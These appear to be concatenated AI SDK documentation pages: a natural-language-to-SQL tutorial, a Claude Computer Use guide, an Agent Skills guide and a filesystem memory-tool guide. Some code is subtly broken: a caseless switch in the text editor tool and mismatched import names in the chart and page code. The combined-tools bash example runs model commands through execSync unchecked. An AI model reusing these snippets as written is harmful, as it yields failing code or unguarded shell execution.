Basic components built with shadcn/ui (components/)
Function to run SQL queries (app/actions.ts)
Type definitions for the database schema (lib/types.ts)

Existing components

The application contains a single page in app/page.tsx that serves as the main interface.

Initially, the page shows a collection of suggested example queries (suggested-queries.tsx) that you can click to quickly try out the functionality.

When you submit a query:

The suggested queries section disappears and a loading state appears
Once complete, a card appears with "TODO - IMPLEMENT ABOVE" (query-viewer.tsx) which will eventually show your generated SQL
Below that is an empty results area with "No results found" (results.tsx)

After you implement the core functionality:

The results section will display data in a table format
A toggle button will allow switching between table and chart views
The chart view will visualize your query results

Let's implement the AI-powered functionality to bring it all together.

Building the application

As a reminder, this application will have three main features:

Generate SQL queries from natural language
Create a chart from the query results
Explain SQL queries in plain English

Let's start with generating a SQL query from natural language.

Generate SQL queries

Providing context

For the model to generate accurate SQL queries, it needs context about your database schema, tables, and relationships. You will communicate this information through a prompt that should include:

Schema information
Example data formats
Available SQL operations
Best practices for query structure
Nuanced advice for specific fields

Let's write a prompt that includes all of this information:

You are a SQL (postgres) and data visualization expert. Your job is to help the user write a SQL query to retrieve the data they need. The table schema is as follows:

unicorns (
  id SERIAL PRIMARY KEY,
  company VARCHAR(255) NOT NULL UNIQUE,
  valuation DECIMAL(10, 2) NOT NULL,
  date_joined DATE,
  country VARCHAR(255) NOT NULL,
  city VARCHAR(255) NOT NULL,
  industry VARCHAR(255) NOT NULL,
  select_investors TEXT NOT NULL
);

Only retrieval queries are allowed.

For things like industry, company names and other string fields, use the ILIKE operator and convert both the search term and the field to lowercase using LOWER() function. For example: LOWER(industry) ILIKE LOWER('%search_term%').

Note: select_investors is a comma-separated list of investors. Trim whitespace to ensure you're grouping properly. Note, some fields may be null or have only one value.
When answering questions about a specific field, ensure you are selecting the identifying column (ie. what is Vercel's valuation would select company and valuation').

The industries available are:
- healthcare & life sciences
- consumer & retail
- financial services
- enterprise tech
- insurance
- media & entertainment
- industrials
- health

If the user asks for a category that is not in the list, infer based on the list above.

Note: valuation is in billions of dollars so 10b would be 10.0.
Note: if the user asks for a rate, return it as a decimal. For example, 0.1 would be 10%.

If the user asks for 'over time' data, return by year.

When searching for UK or USA, write out United Kingdom or United States respectively.

EVERY QUERY SHOULD RETURN QUANTITATIVE DATA THAT CAN BE PLOTTED ON A CHART! There should always be at least two columns. If the user asks for a single column, return the column and the count of the column. If the user asks for a rate, return the rate as a decimal. For example, 0.1 would be 10%.

There are several important elements of this prompt:

Schema description helps the model understand exactly what data fields to work with
Includes rules for handling queries based on common SQL patterns - for example, always using ILIKE for case-insensitive string matching
Explains how to handle edge cases in the dataset, like dealing with the comma-separated investors field and ensuring whitespace is properly handled
Instead of having the model guess at industry categories, it provides the exact list that exists in the data, helping avoid mismatches
The prompt helps standardize data transformations - like knowing to interpret "10b" as "10.0" billion dollars, or that rates should be decimal values
Clear rules ensure the query output will be chart-friendly by always including at least two columns of data that can be plotted

This prompt structure provides a strong foundation for query generation, but you should experiment and iterate based on your specific needs and the model you're using.

Create a Server Action

With the prompt done, let's create a Server Action.

Open app/actions.ts. You should see one action already defined (runGeneratedSQLQuery).

Add a new action. This action should be asynchronous and take in one parameter - the natural language query.

/* ...rest of the file... */

export const generateQuery = async (input: string) => {};

In this action, you'll use the generateText function with Output from the AI SDK which allows you to constrain the model's output to a pre-defined schema. This process, sometimes called structured output, ensures the model returns only the SQL query without any additional prefixes, explanations, or formatting that would require manual parsing.

/* ...other imports... */
import { generateText, Output } from 'ai';
import { z } from 'zod';

/* ...rest of the file... */

export const generateQuery = async (input: string) => {
  'use server';
  try {
    const result = await generateText({
      model: 'openai/gpt-4o',
      system: `You are a SQL (postgres) ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Generate the query necessary to retrieve the data the user wants: ${input}`,
      output: Output.object({
        schema: z.object({
          query: z.string(),
        }),
      }),
    });
    return result.output.query;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

Update the frontend

Import the generateQuery function and call it with the user's input.

/* ...other imports... */
import { runGeneratedSQLQuery, generateQuery } from './actions';

/* ...rest of the file... */

const handleSubmit = async (suggestion?: string) => {
  clearExistingData();

  const question = suggestion ?? inputValue;
  if (inputValue.length === 0 && !suggestion) return;

  if (question.trim()) {
    setSubmitted(true);
  }

  setLoading(true);
  setLoadingStep(1);
  setActiveQuery('');

  try {
    const query = await generateQuery(question);

    if (query === undefined) {
      toast.error('An error occurred. Please try again.');
      setLoading(false);
      return;
    }

    setActiveQuery(query);
    setLoadingStep(2);

    const companies = await runGeneratedSQLQuery(query);
    const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
    setResults(companies);
    setColumns(columns);

    setLoading(false);
  } catch (e) {
    toast.error('An error occurred. Please try again.');
    setLoading(false);
  }
};

/* ...rest of the file... */

Explain SQL Queries

Let's craft a prompt for the explain query functionality:

You are a SQL (postgres) expert. Your job is to explain to the user the SQL query you wrote to retrieve the data they asked for. The table schema is as follows:
unicorns (
  id SERIAL PRIMARY KEY,
  company VARCHAR(255) NOT NULL UNIQUE,
  valuation DECIMAL(10, 2) NOT NULL,
  date_joined DATE,
  country VARCHAR(255) NOT NULL,
  city VARCHAR(255) NOT NULL,
  industry VARCHAR(255) NOT NULL,
  select_investors TEXT NOT NULL
);

When you explain you must take a section of the query, and then explain it. Each "section" should be unique. So in a query like: "SELECT * FROM unicorns limit 20", the sections could be "SELECT *", "FROM UNICORNS", "LIMIT 20".
If a section doesn't have any explanation, include it, but leave the explanation empty.

Create a Server Action

Add a new Server Action to generate explanations for SQL queries.

This action takes two parameters - the original natural language input and the generated SQL query.

/* ...rest of the file... */

export const explainQuery = async (input: string, sqlQuery: string) => {
  'use server';
  try {
    const result = await generateText({
      model: 'openai/gpt-4o',
      system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.

      User Query:
      ${input}

      Generated SQL Query:
      ${sqlQuery}`,
    });
    return result.text;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

This action uses the generateText function. However, you haven't defined the output schema yet. Let's define it in another file so it can also be used as a type in your components.

Update your lib/types.ts file to include the schema for the explanations:

import { z } from 'zod';

/* ...rest of the file... */

export const explanationSchema = z.object({
  section: z.string(),
  explanation: z.string(),
});

export type QueryExplanation = z.infer<typeof explanationSchema>;

// other imports
import { explanationSchema } from '@/lib/types';

/* ...rest of the file... */

export const explainQuery = async (input: string, sqlQuery: string) => {
  'use server';
  try {
    const result = await generateText({
      model: 'openai/gpt-4o',
      system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.

      User Query:
      ${input}

      Generated SQL Query:
      ${sqlQuery}`,
      output: Output.array({ element: explanationSchema }),
    });
    return result.output;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

Update query viewer

/* ...other imports... */
import { explainQuery } from '@/app/actions';

/* ...rest of the component... */

const handleExplainQuery = async () => {
  setQueryExpanded(true);
  setLoadingExplanation(true);

  const explanations = await explainQuery(inputValue, activeQuery);
  setQueryExplanations(explanations);

  setLoadingExplanation(false);
};

/* ...rest of the component... */

Now when users click the explanation button (the question mark icon), the component will:

Show a loading state
Send the active SQL query and the users natural language query to your Server Action
The model will generate an array of explanations
The explanations will be set in the component state and rendered in the UI

Submit a new query and then click the explanation button. Hover over different elements of the query. You should see the explanations for each section!

Visualizing query results

Finally, let's render the query results visually in a chart. There are two approaches you could take:

Send both the query and data to the model and ask it to return the data in a visualization-ready format. While this provides complete control over the visualization, it requires the model to send back all of the data, which significantly increases latency and costs.
Send the query and data to the model and ask it to generate a chart configuration (fixed-size and not many tokens) that maps your data appropriately. This configuration specifies how to visualize the information while delivering the insights from your natural language query. Importantly, this is done without requiring the model return the full dataset.

Since you don't know the SQL query or data shape beforehand, let's use the second approach to dynamically generate chart configurations based on the query results and user intent.

Generate the chart configuration

Chart type (bar, line, area, or pie)
Axis mappings
Visual styling

Let's start by defining the schema for the chart configuration in lib/types.ts:

/* ...rest of the file... */

export const configSchema = z
  .object({
    description: z
      .string()
      .describe(
        'Describe the chart. What is it showing? What is interesting about the way the data is displayed?',
      ),
    takeaway: z.string().describe('What is the main takeaway from the chart?'),
    type: z.enum(['bar', 'line', 'area', 'pie']).describe('Type of chart'),
    title: z.string(),
    xKey: z.string().describe('Key for x-axis or category'),
    yKeys: z
      .array(z.string())
      .describe(
        'Key(s) for y-axis values this is typically the quantitative column',
      ),
    multipleLines: z
      .boolean()
      .describe(
        'For line charts only: whether the chart is comparing groups of data.',
      )
      .optional(),
    measurementColumn: z
      .string()
      .describe(
        'For line charts only: key for quantitative y-axis column to measure against (eg. values, counts etc.)',
      )
      .optional(),
    lineCategories: z
      .array(z.string())
      .describe(
        'For line charts only: Categories used to compare different lines or data series. Each category represents a distinct line in the chart.',
      )
      .optional(),
    colors: z
      .record(
        z.string().describe('Any of the yKeys'),
        z.string().describe('Color value in CSS format (e.g., hex, rgb, hsl)'),
      )
      .describe('Mapping of data keys to color values for chart elements')
      .optional(),
    legend: z.boolean().describe('Whether to show legend'),
  })
  .describe('Chart configuration object');

export type Config = z.infer<typeof configSchema>;

Create the Server Action

Create a new action in app/actions.ts:

/* ...other imports... */
import { Config, configSchema, explanationsSchema, Result } from '@/lib/types';

/* ...rest of the file... */

export const generateChartConfig = async (
  results: Result[],
  userQuery: string,
) => {
  'use server';

  try {
    const { output: config } = await generateText({
      model: 'openai/gpt-4o',
      system: 'You are a data visualization expert.',
      prompt: `Given the following data from a SQL query result, generate the chart config that best visualises the data and answers the users query.
      For multiple groups use multi-lines.

      Here is an example complete config:
      export const chartConfig = {
        type: "pie",
        xKey: "month",
        yKeys: ["sales", "profit", "expenses"],
        colors: {
          sales: "#4CAF50",    // Green for sales
          profit: "#2196F3",   // Blue for profit
          expenses: "#F44336"  // Red for expenses
        },
        legend: true
      }

      User Query:
      ${userQuery}

      Data:
      ${JSON.stringify(results, null, 2)}`,
      output: Output.object({ schema: configSchema }),
    });

    // Override with shadcn theme colors
    const colors: Record<string, string> = {};
    config.yKeys.forEach((key, index) => {
      colors[key] = `hsl(var(--chart-${index + 1}))`;
    });

    const updatedConfig = { ...config, colors };
    return { config: updatedConfig };
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate chart suggestion');
  }
};

Update the chart component

With the action in place, you'll want to trigger it automatically after receiving query results. This ensures the visualization appears almost immediately after data loads.

Update the handleSubmit function in your root page (app/page.tsx) to generate and set the chart configuration after running the query:

/* ...other imports... */
import { getCompanies, generateQuery, generateChartConfig } from './actions';

/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
  clearExistingData();

  const question = suggestion ?? inputValue;
  if (inputValue.length === 0 && !suggestion) return;

  if (question.trim()) {
    setSubmitted(true);
  }

  setLoading(true);
  setLoadingStep(1);
  setActiveQuery('');

  try {
    const query = await generateQuery(question);

    if (query === undefined) {
      toast.error('An error occurred. Please try again.');
      setLoading(false);
      return;
    }

    setActiveQuery(query);
    setLoadingStep(2);

    const companies = await runGeneratedSQLQuery(query);
    const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
    setResults(companies);
    setColumns(columns);

    setLoading(false);

    const { config } = await generateChartConfig(companies, question);
    setChartConfig(config);
  } catch (e) {
    toast.error('An error occurred. Please try again.');
    setLoading(false);
  }
};

/* ...rest of the file... */

Now when users submit queries, the application will:

Generate and run the SQL query
Display the table results
Generate a chart configuration for the results
Allow toggling between table and chart views

Head back to the browser and test the application with a few queries. You should see the chart visualization appear after the table results.

Next steps

You've built an AI-powered SQL analysis tool that can convert natural language to SQL queries, visualize query results, and explain SQL queries in plain English.

title: Get started with Computer Use description: Get started with Claude's Computer Use capabilities with the AI SDK tags: ['computer-use', 'tools']

Get started with Computer Use

Computer Use

Anthropic recently released a new version of the Claude 3.5 Sonnet model which is capable of 'Computer Use'. This allows the model to interact with computer interfaces through basic actions like:

Moving the cursor
Clicking buttons
Typing text
Taking screenshots
Reading screen content

How It Works

Computer Use enables the model to read and interact with on-screen content through a series of coordinated steps. Here's how the process works:

Start with a prompt and tools

Add Anthropic-defined Computer Use tools to your request and provide a task (prompt) for the model. For example: "save an image to your downloads folder."
Select the right tool

The model evaluates which computer tools can help accomplish the task. It then sends a formatted tool_call to use the appropriate tool.
Execute the action and return results

The AI SDK processes Claude's request by running the selected tool. The results can then be sent back to Claude through a tool_result message.
Complete the task through iterations

Claude analyzes each result to determine if more actions are needed. It continues requesting tool use and processing results until it completes your task or requires additional input.

Available Tools

There are three main tools available in the Computer Use API:

Computer Tool: Enables basic computer control like mouse movement, clicking, and keyboard input
Text Editor Tool: Provides functionality for viewing and editing text files
Bash Tool: Allows execution of bash commands

Implementation Considerations

Set up a controlled environment for Computer Use execution
Implement core functionality like mouse control and keyboard input
Handle screenshot capture and processing
Set up rules and limits for how Claude can interact with your system

The recommended approach is to start with Anthropic's reference implementation , which provides:

A containerized environment configured for safe Computer Use
Ready-to-use (Python) implementations of Computer Use tools
An agent loop for API interaction and tool execution
A web interface for monitoring and control

This reference implementation serves as a foundation to understand the requirements before building your own custom solution.

Getting Started with the AI SDK

First, ensure you have the AI SDK and Anthropic AI SDK provider installed:

Here's how you could set up the Computer Tool with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { getScreenshot, executeComputerAction } from '@/utils/computer-use';

const computerTool = anthropic.tools.computer_20250124({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  execute: async ({ action, coordinate, text }) => {
    switch (action) {
      case 'screenshot': {
        return {
          type: 'image',
          data: getScreenshot(),
        };
      }
      default: {
        return executeComputerAction(action, coordinate, text);
      }
    }
  },
  toModelOutput({ output }) {
    return typeof output === 'string'
      ? [{ type: 'text', text: output }]
      : [{ type: 'image', data: output.data, mediaType: 'image/png' }];
  },
});

Using Computer Tools with Text Generation

Once your tool is defined, you can use it with both the generateText and streamText functions.

For one-shot text generation, use generateText:

const result = await generateText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: 'Move the cursor to the center of the screen and take a screenshot',
  tools: { computer: computerTool },
});

console.log(result.text);

For streaming responses, use streamText to receive updates in real-time:

const result = streamText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: 'Open the browser and navigate to vercel.com',
  tools: { computer: computerTool },
});

for await (const chunk of result.textStream) {
  console.log(chunk);
}

Configure Multi-Step (Agentic) Generations

import { stepCountIs } from 'ai';

const stream = streamText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: 'Open the browser and navigate to vercel.com',
  tools: { computer: computerTool },
  stopWhen: stepCountIs(10), // experiment with this value based on your use case
});

Combine Multiple Tools

You can combine multiple tools in a single request to enable more complex workflows. The AI SDK supports all three of Claude's Computer Use tools:

const computerTool = anthropic.tools.computer_20250124({
  ...
});

const bashTool = anthropic.tools.bash_20250124({
  execute: async ({ command, restart }) => execSync(command).toString()
});

const textEditorTool = anthropic.tools.textEditor_20250124({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    insert_text,
    old_str,
    view_range
  }) => {
    // Handle file operations based on command
    switch(command) {
      return executeTextEditorFunction({
        command,
        path,
        fileText: file_text,
        insertLine: insert_line,
        newStr: new_str,
        insertText: insert_text,
        oldStr: old_str,
        viewRange: view_range
      });
    }
  }
});


const response = await generateText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
  tools: {
    computer: computerTool,
    bash: bashTool,
    str_replace_editor: textEditorTool,
  },
});

Best Practices for Computer Use

To get the best results when using Computer Use:

Specify simple, well-defined tasks with explicit instructions for each step
Prompt Claude to verify outcomes through screenshots
Use keyboard shortcuts when UI elements are difficult to manipulate
Include example screenshots for repeatable tasks
Provide explicit tips in system prompts for known tasks

Security Measures

Use a dedicated virtual machine or container with minimal privileges to prevent direct system attacks or accidents.
Avoid giving the model access to sensitive data, such as account login information, to prevent information theft.
Limit internet access to an allowlist of domains to reduce exposure to malicious content.
Ask a human to confirm decisions that may result in meaningful real-world consequences as well as any tasks requiring affirmative consent, such as accepting cookies, executing financial transactions, or agreeing to terms of service.

title: Add Skills to Your Agent description: Learn how to extend your agent with specialized capabilities loaded at runtime with Agent Skills. tags: ['agent', 'skills', 'tools', 'extensibility']

Add Skills to Your Agent

In this guide, you will learn how to extend your agent with Agent Skills, a lightweight, open format for adding specialized knowledge and workflows that load at runtime from markdown files.

At its core, a skill is a folder containing a SKILL.md file with metadata and instructions that tell an agent how to perform a specific task.

my-skill/
├── SKILL.md          # Required: instructions + metadata
├── scripts/          # Optional: executable code
├── references/       # Optional: documentation
└── assets/           # Optional: templates, resources

How Skills Work

Skills use progressive disclosure to manage context efficiently:

Discovery: At startup, agents load only the name and description of each available skill (just enough to know when it might be relevant)
Activation: When a task matches a skill's description, the agent reads the full SKILL.md instructions into context
Execution: The agent follows the instructions, optionally loading referenced files or executing bundled code as needed

This approach keeps agents fast while giving them access to more context on demand.

The SKILL.md File

Every skill starts with a SKILL.md file containing YAML frontmatter and Markdown instructions:

---
name: pdf-processing
description: Extract text and tables from PDF files, fill forms, merge documents.
---

# PDF Processing

## When to use this skill
Use this skill when the user needs to work with PDF files...

## How to extract text
1. Use pdfplumber for text extraction...

## How to fill forms
...

The frontmatter requires:

name: A short identifier
description: Instructions for when to use this skill

The Markdown body contains the actual skill content with no restrictions on structure or content.

Prerequisites

To support skills, your agent needs:

Filesystem access to discover and load skill files (read files, read directories)
A load skill tool that reads the SKILL.md content into context
Command execution (optional) if skills bundle scripts (e.g. a full sandbox environment)

Step 1: Define a Sandbox Abstraction

Create a generic sandbox interface that provides a consistent way to interact with the filesystem. This abstraction lets you implement it differently depending on your environment (Node.js fs, a containerized sandbox, cloud storage, etc.):

interface Sandbox {
  readFile(path: string, encoding: 'utf-8'): Promise<string>;
  readdir(
    path: string,
    opts: { withFileTypes: true },
  ): Promise<{ name: string; isDirectory(): boolean }[]>;
  exec(command: string): Promise<{ stdout: string; stderr: string }>;
}

Step 2: Discover Skills at Startup

Scan skill directories and extract metadata from each SKILL.md:

interface SkillMetadata {
  name: string;
  description: string;
  path: string;
}

async function discoverSkills(
  sandbox: Sandbox,
  directories: string[],
): Promise<SkillMetadata[]> {
  const skills: SkillMetadata[] = [];
  const seenNames = new Set<string>();

  for (const dir of directories) {
    let entries;
    try {
      entries = await sandbox.readdir(dir, { withFileTypes: true });
    } catch {
      continue; // Skip directories that don't exist
    }

    for (const entry of entries) {
      if (!entry.isDirectory()) continue;

      const skillDir = `${dir}/${entry.name}`;
      const skillFile = `${skillDir}/SKILL.md`;

      try {
        const content = await sandbox.readFile(skillFile, 'utf-8');
        const frontmatter = parseFrontmatter(content);

        // First skill with a given name wins (allows project overrides)
        if (seenNames.has(frontmatter.name)) continue;
        seenNames.add(frontmatter.name);

        skills.push({
          name: frontmatter.name,
          description: frontmatter.description,
          path: skillDir,
        });
      } catch {
        continue; // Skip skills without valid SKILL.md
      }
    }
  }
  return skills;
}

function parseFrontmatter(content: string) {
  const match = content.match(/^---\r?\n([\s\S]*?)\r?\n---/);
  if (!match?.[1]) throw new Error('No frontmatter found');
  // Parse YAML using your preferred library
  return yaml.parse(match[1]);
}

Step 3: Build the System Prompt

Include discovered skills in the system prompt so the agent knows what's available:

function buildSkillsPrompt(skills: SkillMetadata[]): string {
  const skillsList = skills
    .map(s => `- ${s.name}: ${s.description}`)
    .join('\n');

  return `
## Skills

Use the \`loadSkill\` tool to load a skill when the user's request
would benefit from specialized instructions.

Available skills:
${skillsList}
`;
}

The agent sees only names and descriptions. Full instructions stay out of the context window until loaded.

Step 4: Create the Load Skill Tool

The load skill tool reads the full SKILL.md and returns the body (without frontmatter):

function stripFrontmatter(content: string): string {
  const match = content.match(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/);
  return match ? content.slice(match[0].length).trim() : content.trim();
}

const loadSkillTool = tool({
  description: 'Load a skill to get specialized instructions',
  inputSchema: z.object({
    name: z.string().describe('The skill name to load'),
  }),
  execute: async ({ name }, { experimental_context }) => {
    const { sandbox, skills } = experimental_context as {
      sandbox: Sandbox;
      skills: SkillMetadata[];
    };

    const skill = skills.find(s => s.name.toLowerCase() === name.toLowerCase());
    if (!skill) {
      return { error: `Skill '${name}' not found` };
    }

    const skillFile = `${skill.path}/SKILL.md`;
    const content = await sandbox.readFile(skillFile, 'utf-8');
    const body = stripFrontmatter(content);

    return {
      skillDirectory: skill.path,
      content: body,
    };
  },
});

The tool returns the skill directory path alongside the content so the agent can construct full paths to bundled resources.

Step 5: Create the Agent

Wire up the sandbox and skills using callOptionsSchema and prepareCall:

const callOptionsSchema = z.object({
  sandbox: z.custom<Sandbox>(),
  skills: z.array(
    z.object({
      name: z.string(),
      description: z.string(),
      path: z.string(),
    }),
  ),
});

const readFileTool = tool({
  description: 'Read a file from the filesystem',
  inputSchema: z.object({ path: z.string() }),
  execute: async ({ path }, { experimental_context }) => {
    const { sandbox } = experimental_context as { sandbox: Sandbox };
    return sandbox.readFile(path, 'utf-8');
  },
});

const bashTool = tool({
  description: 'Execute a bash command',
  inputSchema: z.object({ command: z.string() }),
  execute: async ({ command }, { experimental_context }) => {
    const { sandbox } = experimental_context as { sandbox: Sandbox };
    return sandbox.exec(command);
  },
});

const agent = new ToolLoopAgent({
  model: yourModel,
  tools: {
    loadSkill: loadSkillTool,
    readFile: readFileTool,
    bash: bashTool,
  },
  callOptionsSchema,
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    instructions: `${settings.instructions}\n\n${buildSkillsPrompt(options.skills)}`,
    experimental_context: {
      sandbox: options.sandbox,
      skills: options.skills,
    },
  }),
});

Step 6: Run the Agent

// Create sandbox (your filesystem/execution abstraction)
const sandbox = createSandbox({ workingDirectory: process.cwd() });

// Discover skills at startup
const skills = await discoverSkills(sandbox, [
  '.agents/skills',
  '~/.config/agent/skills',
]);

// Run the agent
const result = await agent.run({
  prompt: userMessage,
  options: { sandbox, skills },
});

When a user asks something that matches a skill description, the agent calls loadSkill. The full instructions load into context, and the agent follows them using bash and readFile to access bundled resources.

Accessing Bundled Resources

Skills can reference files relative to their directory. The agent uses existing tools to access them:

Skill directory: /path/to/.agents/skills/my-skill

# My Skill Instructions

Read the configuration template:
templates/config.json

Run the setup script:
bash scripts/setup.sh

The agent sees the skill directory path in the tool result and prepends it when accessing templates/config.json or scripts/setup.sh. No special resource loading mechanism is needed—the agent uses the same tools it uses for everything else.

Learn More

Agent Skills specification for the full format details
Example skills on GitHub
Authoring best practices for writing effective skills
Reference library to validate skills and generate prompt XML
skills.sh to browse and discover community skills

title: Build a Custom Memory Tool description: Build an agent that persists memories using a filesystem-backed memory tool.

Build a Custom Memory Tool

Memory means saving the right information at the right time, in the right place, and injecting it back into the conversation when it matters. Without memory, your agent treats every conversation as its first. With memory, your agent builds context over time, recalls previous interactions, and adapts to the user.

The Storage Primitive: The Filesystem

Where should you store memories? Files organized in a filesystem-like structure are a natural fit:

Persistence: you can persist files across process restarts and conversations
Speed: reading and writing files is fast, even at scale
Familiarity: language models understand files and paths from their training data
Hierarchy: you can use a directory structure to create deep and organized memory banks, grouping memories by topic, time, or type

The key insight is that "filesystem" here is an abstraction. The backing store does not matter. You could use a real sandboxed filesystem, an in-memory virtual filesystem, or a shim over Postgres. What matters is the concept: files organized in a hierarchical structure, and an interface that can manipulate, search, read, and edit those files. That is the primitive.

The Interface: A Memory Tool

You have files. Now the model needs to interact with them. You give the model a tool, along with instructions for when and how to use it. There are two approaches:

Structured Actions Tool

Define explicit actions the model can take (view, create, update, search) and have the model generate structured input that you handle yourself:

{
  "name": "memory",
  "input": {
    "command": "view",
    "path": "/memories/customer_service_guidelines.xml"
  }
}

This is safe by design since you control every operation that runs. However, it requires more upfront implementation and limits the model to only the actions you have built.

Bash-Backed Tool

The alternative is to back the memory tool with bash. Models are proficient at composing shell commands, which lets them craft flexible queries to access what they need: cat a file, grep for patterns, pipe commands together, or perform in-place edits with sed. This is the more powerful approach, but it requires careful work to build an approval system that prevents prompt injection and blocks dangerous commands.

Types of Memory

Not all memories are equal. They differ in how you store them, how often the model accesses them, and when they surface:

Core Memory: information included in every turn. This can range from the user's name to instructions for where to find other memories. You inject core memory directly into the system prompt, so the model always has it without needing a tool call.
Archival Memory: a notes folder or file where the model stores detailed knowledge. Think of it as the model's notebook, where it writes down facts, summaries, and observations for later. The model reads and writes archival memory on demand through the memory tool.
Recall Memory: the conversations themselves. By persisting full turn-by-turn history, the model can search previous interactions to surface relevant context from past discussions.

These memory terms are based on Letta's definitions.

What We Will Build

This recipe is a simplified demonstration of these concepts. You build one memory tool over a shared .memory store, then wire it into an agent with prepareCall so core memory is injected before each model call. You can implement the tool with structured actions or with a bash-backed interface.

The memory layout is a .memory directory with three files, each mapping to one of the memory types above:

.memory/
├── core.md               # Core memory, injected every turn
├── notes.md              # Archival memory, timestamped notes
└── conversations.jsonl   # Recall memory, full turn history (JSONL)

Prerequisites

To follow this guide, you need the following:

AI SDK with ToolLoopAgent and tool
Zod for tool input schemas
Optional for Route B (bash-backed): just-bash for command execution and AST parsing

Install dependencies for both routes:

pnpm add ai just-bash zod

If you only use Route A (structured actions), you can skip just-bash.

Implementation Requirements

Before building the agent, you need shared infrastructure plus one route-specific piece:

Bootstrap the filesystem. On startup, ensure the memory directory and its files exist with reasonable defaults. This is a one-time setup step: create the directory if missing, seed each file with starter content if it does not already exist, and add the memory directory to .gitignore to keep it local and private.
Helper functions for core memory and conversation logging. You need a way to read core memory (so you can inject it into the system prompt) and a way to append conversation entries. Conversations are stored as JSONL (one JSON object per line), which makes them straightforward to grep for keywords and pipe through jq for formatting.
Route-specific execution safety.
- Route A (structured actions): keep the action set small and explicit (view, create, update, search) and only operate on known .memory paths.
- Route B (bash-backed): validate commands before execution. Users can craft prompts that try to run harmful commands, so use AST-based validation and an allowlist. See the Appendix for a full implementation with just-bash.

Step 1: Define the Memory Tool

Choose your tool interface first. Both routes use the same .memory files, the same prepareCall injection pattern, and the same conversation logging. The only difference is how the model issues memory operations.

Route A: Structured Actions Tool

Use this when you want predictable, explicit operations (view, create, update, search) and minimal command-safety surface.

Define a schema and route every request through your own runMemoryCommand handler:

import { tool } from 'ai';
import { z } from 'zod';

const memoryInputSchema = z.object({
  command: z
    .enum(['view', 'create', 'update', 'search'])
    .describe(
      'Memory action: view to read, create to write new content, update to change existing content, search to find relevant lines.',
    ),
  path: z
    .string()
    .optional()
    .describe(
      'Memory path under /memories, such as /memories/core.md or /memories/notes.md. Required for view, create, and update.',
    ),
  content: z
    .string()
    .optional()
    .describe('Text to write for create or update commands.'),
  mode: z
    .enum(['append', 'overwrite'])
    .optional()
    .describe(
      'Write mode for update: append adds to existing content, overwrite replaces it. Defaults to overwrite.',
    ),
  query: z
    .string()
    .optional()
    .describe(
      'Search keywords for the search command. Prefer short focused terms.',
    ),
});

const memoryTool = tool({
  description: `Use this tool to read and maintain long-term memory under /memories.

Rules:
- If the user prompt might depend on preferences, history, constraints, or goals, search first, then reply.
- If the prompt is fully self-contained or general knowledge, reply directly.
- Keep searches short and focused (1-4 words).
- Store durable user facts in /memories/core.md and detailed notes in /memories/notes.md.
- Keep memory operations invisible in user-facing replies.`,
  inputSchema: memoryInputSchema,
  execute: async input => {
    try {
      const output = await runMemoryCommand(input);
      return { output };
    } catch (error) {
      return { output: `Memory action failed: ${(error as Error).message}` };
    }
  },
});

This keeps memory operations predictable because the model can only call predefined actions.

Route B: Bash-Backed Tool

Use this when you want maximum flexibility in reads, writes, and ad-hoc search.

import { tool } from 'ai';
import { Bash, ReadWriteFs } from 'just-bash';
import { z } from 'zod';

const fs = new ReadWriteFs({ root: process.cwd() });
const bash = new Bash({ fs, cwd: '/' });

const memoryTool = tool({
  description: `Run bash commands only for memory-related tasks.

This tool is restricted to memory workflows. Do not use it for
general project work, code changes, dependency management, or
system administration.

Inside the tool, use paths under /.memory:
- /.memory/core.md for key facts that should be reused later
- /.memory/notes.md for detailed notes
- /.memory/conversations.jsonl for full turn history

Rules:
- Only perform memory-related reads/writes and conversation recall
- Keep /.memory/core.md short and focused
- Prefer append-friendly notes in /.memory/notes.md for details
- If the user asks about prior conversations, search
  /.memory/conversations.jsonl for relevant keywords first
- Use >> to append, > to overwrite, and perl -pi -e for in-place edits

Examples:
- cat /.memory/core.md
- echo "- User prefers concise answers" >> /.memory/core.md
- perl -pi -e 's/concise answers/detailed answers/g' /.memory/core.md
- grep -n "project" /.memory/notes.md
- echo "2026-02-16: started a Rust CLI" >> /.memory/notes.md
- grep -niE "pricing|budget" /.memory/conversations.jsonl
- tail -n 40 /.memory/conversations.jsonl | jq -c '.role + ": " + .content'`,
  inputSchema: z.object({
    command: z.string().describe('The bash command to execute.'),
  }),
  execute: async ({ command }) => {
    const unapprovedCommand = findUnapprovedCommand(command);
    if (unapprovedCommand) {
      return {
        stdout: '',
        stderr: `Blocked unapproved command: ${unapprovedCommand}\n`,
        exitCode: 1,
      };
    }

    const result = await bash.exec(command);
    return {
      stdout: result.stdout,
      stderr: result.stderr,
      exitCode: result.exitCode,
    };
  },
});

ReadWriteFs reads and writes directly to the real filesystem, rooted at process.cwd(). Paths inside the bash interpreter map directly to disk: /.memory/core.md resolves to <project-root>/.memory/core.md.

